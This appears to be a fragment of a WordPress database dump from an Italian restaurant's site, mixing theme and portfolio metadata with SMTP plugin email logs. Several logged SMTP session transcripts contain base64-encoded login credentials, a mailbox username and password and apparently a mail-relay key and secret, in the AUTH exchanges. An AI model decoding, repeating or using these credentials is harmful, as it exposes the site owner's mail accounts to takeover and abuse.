Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25871,3102,'mkdf_portfolio_single_template_meta','small-images'),(25872,3102,'_wp_old_slug','h1-2-2'),(25873,3102,'_wp_old_slug','h2-1'),(25874,3102,'_dp_original','1019'),(25875,3102,'_wp_old_slug','h7-6'),(25876,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25877,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25878,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25879,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25880,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25881,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25883,2344,'mkdf_page_content_behind_header_meta','no'),(25884,2344,'mkdf_page_content_padding','115px 0 100px 0'),(25885,2344,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25886,2344,'portfolio_single_back_to_link','1008'),(25887,2344,'mkdf_disable_vertical_header_background_image_meta','no'),(25888,2344,'mkdf_disable_header_widget_areas_meta','no'),(25889,2344,'slide_template','default'),(25890,2344,'_wpb_vc_js_status','true'),(25891,2344,'mkdf-portfolio-image-gallery','567,566,565'),(25892,2344,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25893,2344,'mkdf_portfolio_single_template_meta','small-images'),(25894,2344,'_wp_old_slug','h1-2-2'),(25895,2344,'_wp_old_slug','h2-1'),(25896,2344,'_wp_old_slug','h7-6'),(25897,2344,'_dp_original','1048'),(25898,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25899,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25900,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25901,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25902,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25904,2345,'mkdf_page_content_behind_header_meta','no'),(25905,2345,'mkdf_page_content_padding','115px 0 100px 0'),(25906,2345,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25907,2345,'portfolio_single_back_to_link','1008'),(25908,2345,'mkdf_disable_vertical_header_background_image_meta','no'),(25909,2345,'mkdf_disable_header_widget_areas_meta','no'),(25910,2345,'slide_template','default'),(25911,2345,'_wpb_vc_js_status','true'),(25912,2345,'mkdf-portfolio-image-gallery','565,566,567'),(25913,2345,'mkdf_portfolio_single_template_meta','small-slider'),(25914,2345,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25915,2345,'_wp_old_slug','h7-2'),(25916,2345,'_dp_original','1020'),(25938,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25939,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25940,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25941,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25942,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25943,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25944,2899,'_thumbnail_id','591'),(25945,2899,'mkdf_page_content_behind_header_meta','no'),(25946,2899,'mkdf_page_content_padding','115px 0 100px 0'),(25947,2899,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25948,2899,'portfolio_single_back_to_link','569'),(25949,2899,'mkdf_disable_vertical_header_background_image_meta','no'),(25950,2899,'mkdf_disable_header_widget_areas_meta','no'),(25951,2899,'slide_template','default'),(25952,2899,'_wpb_vc_js_status','true'),(25953,2899,'mkdf-portfolio-image-gallery','567,566,565'),(25954,2899,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25955,2899,'mkdf_portfolio_single_template_meta','slider'),(25956,2899,'_wp_old_slug','h8-5'),(25957,2899,'_dp_original','590'),(25958,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25959,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25960,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25961,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25962,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25963,2900,'_thumbnail_id','589'),(25964,2900,'mkdf_page_content_behind_header_meta','no'),(25965,2900,'mkdf_page_content_padding','115px 0 100px 0'),(25966,2900,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25967,2900,'portfolio_single_back_to_link','569'),(25968,2900,'mkdf_disable_vertical_header_background_image_meta','no'),(25969,2900,'mkdf_disable_header_widget_areas_meta','no'),(25970,2900,'slide_template','default'),(25971,2900,'_wpb_vc_js_status','true'),(25972,2900,'mkdf-portfolio-image-gallery','567,566,565'),(25973,2900,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25974,2900,'mkdf_portfolio_single_template_meta','masonry'),(25975,2900,'_wp_old_slug','h8-4'),(25976,2900,'_dp_original','588'),(37689,3701,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(37688,3701,'reply_to_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(37687,3701,'to_header','stanszoqcjq@demo.com'),(37686,3701,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(37685,3701,'success','1'),(37684,3701,'solution','Not found, check status column for more info.'),(37813,3714,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Post SMTP (from version 2.0.16 to 2.0.18)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37821,3715,'original_to','webmaster@baldisserri.com'),(37822,3715,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37820,3715,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(37819,3715,'to_header','webmaster@baldisserri.com'),(37818,3715,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37817,3715,'success','1'),(37816,3715,'solution','Not found, check status column for more info.'),(37829,3716,'to_header','webmaster@baldisserri.com'),(37827,3716,'success',''),(37828,3716,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37826,3716,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(37845,3717,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 18 Jan 2021 07:24:14 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.18 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <f347237198dd2107abf334628e441316@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Some plugins were automatically updated\r\nDate: Mon, 18 Jan 2021 12:24:14 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Cook=\r\nie and Consent Solution for the GDPR &amp; ePrivacy (from version 2.3.15=\r\n to 2.3.16)=0A=0A=0AIf you experience any issues or need support, the vo=\r\nlunteers in the WordPress.org support forums may be able to help.=0Ahttp=\r\ns://wordpress.org/support/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK id=1l1TZu-0006rO-Og\r\n'),(37844,3717,'original_headers',''),(37836,3717,'solution','Not found, check status column for more info.'),(37837,3717,'success','1'),(37838,3717,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37839,3717,'to_header','webmaster@baldisserri.com'),(37840,3717,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(37841,3717,'original_to','webmaster@baldisserri.com'),(37842,3717,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37843,3717,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy (from version 2.3.15 to 2.3.16)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37854,3718,'original_headers',''),(37855,3718,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 19 Jan 2021 19:26:06 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(37853,3718,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Post SMTP (from version 2.0.18 to 2.0.19)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37852,3718,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37851,3718,'original_to','webmaster@baldisserri.com'),(37704,3702,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Wed, 06 Jan 2021 19:23:02 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(37703,3702,'original_headers',''),(37714,3703,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Wed, 06 Jan 2021 19:23:04 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.16 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <bc58c306a9fa93baa94a0f0644dc4121@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Some plugins were automatically updated\r\nDate: Thu, 07 Jan 2021 00:23:04 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Akis=\r\nmet Anti-Spam (from version 4.1.7 to 4.1.8)=0A=0A=0AIf you experience an=\r\ny issues or need support, the volunteers in the WordPress.org support fo=\r\nrums may be able to help.=0Ahttps://wordpress.org/support/forums/=0A=0AT=\r\nhe WordPress Team\r\n.\r\n250 OK id=1kxJ4y-0000cf-Hz\r\n'),(37713,3703,'original_headers',''),(37723,3704,'original_message','<!DOCTYPE html>\n<html lang=\"en-US\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Welcome to Sol Y Mar</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hi jilzwxkumqq,</p>\n<p style=\"margin: 0 0 16px;\">Thanks for creating an account on Sol Y Mar. Your username is <strong>jilzwxkumqq</strong>. You can access your account area to view orders, change your password, and more at: <a href=\"https://www.ristorantesolymar.it/mio-account/\" rel=\"nofollow\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">https://www.ristorantesolymar.it/mio-account/</a></p>\n\n<p style=\"margin: 0 0 16px;\">We look forward to seeing you soon.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(37722,3704,'original_subject','Your Sol Y Mar account has been created!'),(37721,3704,'original_to','jilzwxkumqq@demo.com'),(37719,3704,'reply_to_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(37720,3704,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37718,3704,'to_header','jilzwxkumqq@demo.com'),(37716,3704,'success','1'),(37717,3704,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(37725,3704,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<jilzwxkumqq@demo.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.16 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/html; charset=UTF-8\r\nFrom: \"Sol Y Mar, ristorante a Riccione\" <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: jilzwxkumqq@demo.com\r\nReply-To: \"Sol Y Mar, ristorante a Riccione\" <notifiche@ristorantesolymar.it>\r\nMessage-Id: <339822f53cf258d5a71818c0c3e5b384@ristorantesolymar.it>\r\nSubject: Your Sol Y Mar account has been created!\r\nDate: Thu, 07 Jan 2021 11:27:07 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\n<!DOCTYPE html>=0A<html lang=3D\"en-US\">=0A=09<head>=0A=09=09<meta http-e=\r\nquiv=3D\"Content-Type\" content=3D\"text/html; charset=3DUTF-8\">=0A=09=09<t=\r\nitle>Sol Y Mar</title>=0A=09</head>=0A=09<body leftmargin=3D\"0\" marginwi=\r\ndth=3D\"0\" topmargin=3D\"0\" marginheight=3D\"0\" offset=3D\"0\" style=3D\"paddi=\r\nng: 0;\">=0A=09=09<div id=3D\"wrapper\" dir=3D\"ltr\" style=3D\"background-col=\r\nor: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-=\r\nadjust: none;\">=0A=09=09=09<table border=3D\"0\" cellpadding=3D\"0\" cellspa=\r\ncing=3D\"0\" height=3D\"100%\" width=3D\"100%\">=0A=09=09=09=09<tr>=0A=09=09=\r\n=09=09=09<td align=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09<div i=\r\nd=3D\"template_header_image\">=0A=09=09=09=09=09=09=09=09=09=09=09=09=09</=\r\ndiv>=0A=09=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"0\" cellspaci=\r\nng=3D\"0\" width=3D\"600\" id=3D\"template_container\" style=3D\"background-col=\r\nor: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0,=\r\n 0, 0.1); border-radius: 3px;\">=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=\r\n=09=09=09=09=09<td align=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09=\r\n=09=09=09<!-- Header -->=0A=09=09=09=09=09=09=09=09=09<table border=3D\"0=\r\n\" cellpadding=3D\"0\" cellspacing=3D\"0\" width=3D\"100%\" id=3D\"template_head=\r\ner\" style=3D\'background-color: #557da1; color: #ffffff; border-bottom: 0=\r\n; font-weight: bold; line-height: 100%; vertical-align: middle; font-fam=\r\nily: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radi=\r\nus: 3px 3px 0 0;\'>=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=\r\n=09=09=09=09=09=09=09<td id=3D\"header_wrapper\" style=3D\"padding: 36px 48=\r\npx; display: block;\">=0A=09=09=09=09=09=09=09=09=09=09=09=09<h1 style=3D=\r\n\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; fo=\r\nnt-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-alig=\r\nn: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color:=\r\n inherit;\'>Welcome to Sol Y Mar</h1>=0A=09=09=09=09=09=09=09=09=09=09=09=\r\n</td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=\r\n=09</table>=0A=09=09=09=09=09=09=09=09=09<!-- End Header -->=0A=09=09=09=\r\n=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=\r\n=09<tr>=0A=09=09=09=09=09=09=09=09<td align=3D\"center\" valign=3D\"top\">=\r\n=0A=09=09=09=09=09=09=09=09=09<!-- Body -->=0A=09=09=09=09=09=09=09=09=\r\n=09<table border=3D\"0\" cellpadding=3D\"0\" cellspacing=3D\"0\" width=3D\"600\"=\r\n id=3D\"template_body\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=\r\n=09=09=09=09=09=09=09=09<td valign=3D\"top\" id=3D\"body_content\" style=3D\"=\r\nbackground-color: #fdfdfd;\">=0A=09=09=09=09=09=09=09=09=09=09=09=09<!--=\r\n Content -->=0A=09=09=09=09=09=09=09=09=09=09=09=09<table border=3D\"0\" c=\r\nellpadding=3D\"20\" cellspacing=3D\"0\" width=3D\"100%\">=0A=09=09=09=09=09=09=\r\n=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09<t=\r\nd valign=3D\"top\" style=3D\"padding: 48px 48px 32px;\">=0A=09=09=09=09=09=\r\n=09=09=09=09=09=09=09=09=09=09<div id=3D\"body_content_inner\" style=3D\'co=\r\nlor: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, s=\r\nans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>=0A=0A=\r\n<p style=3D\"margin: 0 0 16px;\">Hi jilzwxkumqq,</p>=0A<p style=3D\"margin:=\r\n 0 0 16px;\">Thanks for creating an account on Sol Y Mar. Your username i=\r\ns <strong>jilzwxkumqq</strong>. You can access your account area to view=\r\n orders, change your password, and more at: <a href=3D\"https://www.risto=\r\nrantesolymar.it/mio-account/\" rel=3D\"nofollow\" style=3D\"color: #557da1;=\r\n font-weight: normal; text-decoration: underline;\">https://www.ristorant=\r\nesolymar.it/mio-account/</a></p>=0A=0A<p style=3D\"margin: 0 0 16px;\">We=\r\n look forward to seeing you soon.</p>=0A=09=09=09=09=09=09=09=09=09=09=\r\n=09=09=09=09=09</div>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09</td>=\r\n=0A=09=09=09=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=\r\n=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=09=09=09=09=09<!-- End C=\r\nontent -->=0A=09=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=\r\n=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=\r\n=09=09=09=09=09<!-- End Body -->=0A=09=09=09=09=09=09=09=09</td>=0A=09=\r\n=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09</table>=0A=09=09=09=09=09</=\r\ntd>=0A=09=09=09=09</tr>=0A=09=09=09=09<tr>=0A=09=09=09=09=09<td align=3D=\r\n\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09<!-- Footer -->=0A=09=09=09=\r\n=09=09=09<table border=3D\"0\" cellpadding=3D\"10\" cellspacing=3D\"0\" width=\r\n=3D\"600\" id=3D\"template_footer\">=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=\r\n=09=09=09=09=09<td valign=3D\"top\" style=3D\"padding: 0; border-radius: 6p=\r\nx;\">=0A=09=09=09=09=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"10\"=\r\n cellspacing=3D\"0\" width=3D\"100%\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=\r\n=0A=09=09=09=09=09=09=09=09=09=09=09<td colspan=3D\"2\" valign=3D\"middle\"=\r\n id=3D\"credit\" style=3D\'border-radius: 6px; border: 0; color: #969696; f=\r\nont-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font=\r\n-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>=\r\n=0A=09=09=09=09=09=09=09=09=09=09=09=09<p style=3D\"margin: 0 0 16px;\">So=\r\nl Y Mar, ristorante a Riccione</p>=0A=09=09=09=09=09=09=09=09=09=09=09</=\r\ntd>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09<=\r\n/table>=0A=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=\r\n=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09<!-- End Footer -->=0A=09=\r\n=09=09=09=09</td>=0A=09=09=09=09</tr>=0A=09=09=09</table>=0A=09=09</div>=\r\n=0A=09</body>=0A</html>=0A\r\n.\r\n250 OK queued as e814af46-c202-4a8d-811e-fc3afd148990\r\n'),(37724,3704,'original_headers','Content-Type: text/html\r\nReply-to: Sol Y Mar, ristorante a Riccione 